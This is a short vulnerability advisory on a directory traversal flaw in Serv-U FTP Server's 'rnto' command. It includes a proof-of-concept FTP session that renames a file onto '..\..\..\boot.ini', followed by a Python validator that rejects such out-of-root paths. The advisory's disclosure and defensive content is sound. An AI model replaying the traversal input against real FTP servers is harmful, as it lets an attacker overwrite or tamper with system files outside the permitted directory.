
RhinoSoft Serv-U FTP Server 'rnto' Command Directory Traversal Vulnerability

An attacker can exploit this issue by enticing an unsuspecting victim to connect to a malicious server.

The following proof of concept is available:

220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
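
The server-side check that would refuse the rnto argument in the session above, as an added example (not code from the advisory or from Serv-U). The root C:\ftp\test, the function names and the sample arguments are constructed assumptions, and the check is lexical only, so it does not resolve junctions or 8.3 short names.

```python
import ntpath  # Windows path rules; pure string functions, usable on any OS


class PathEscape(Exception):
    """A client-supplied path resolves outside the account's root directory."""


def resolve_in_root(root: str, cwd: str, arg: str) -> str:
    """Map an FTP path argument (e.g. the RNTO target) to a real Windows path.

    root: real directory the account is locked to (assumed: C:\\ftp\\test)
    cwd:  virtual working directory, "/"-style, relative to root
    arg:  raw argument exactly as the client sent it
    Raises PathEscape if the normalized result is not under root.
    """
    if "\x00" in arg:
        raise PathEscape("NUL byte in path")
    # Windows accepts both separators; the PoC uses backslashes.
    arg = arg.replace("/", "\\")
    # A drive letter or UNC prefix would replace the root when joined.
    drive, _ = ntpath.splitdrive(arg)
    if drive:
        raise PathEscape("drive or UNC prefix not allowed: %r" % arg)
    if arg.startswith("\\"):
        rel = arg.lstrip("\\")            # absolute within the virtual root
    else:
        rel = ntpath.join(cwd.replace("/", "\\").strip("\\"), arg)
    real_root = ntpath.normpath(root)
    # normpath collapses every ".." component before the containment test.
    candidate = ntpath.normpath(ntpath.join(real_root, rel))
    # Compare whole components, case-insensitively: C:\ftp\test2 must not
    # pass as a child of C:\ftp\test, which a plain startswith() would allow.
    want = ntpath.normcase(real_root)
    if ntpath.commonpath([want, ntpath.normcase(candidate)]) != want:
        raise PathEscape("%r escapes %r" % (arg, real_root))
    return candidate


def is_allowed(root: str, cwd: str, arg: str) -> bool:
    """True if arg stays inside root; False is where a server would answer 550."""
    try:
        resolve_in_root(root, cwd, arg)
        return True
    except PathEscape:
        return False
```

Applying the same function to every path-taking command (rnfr, rnto, stor, retr, dele, cwd and so on) keeps one command from being validated more loosely than the others.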

Copyright 2009, SecurityFocus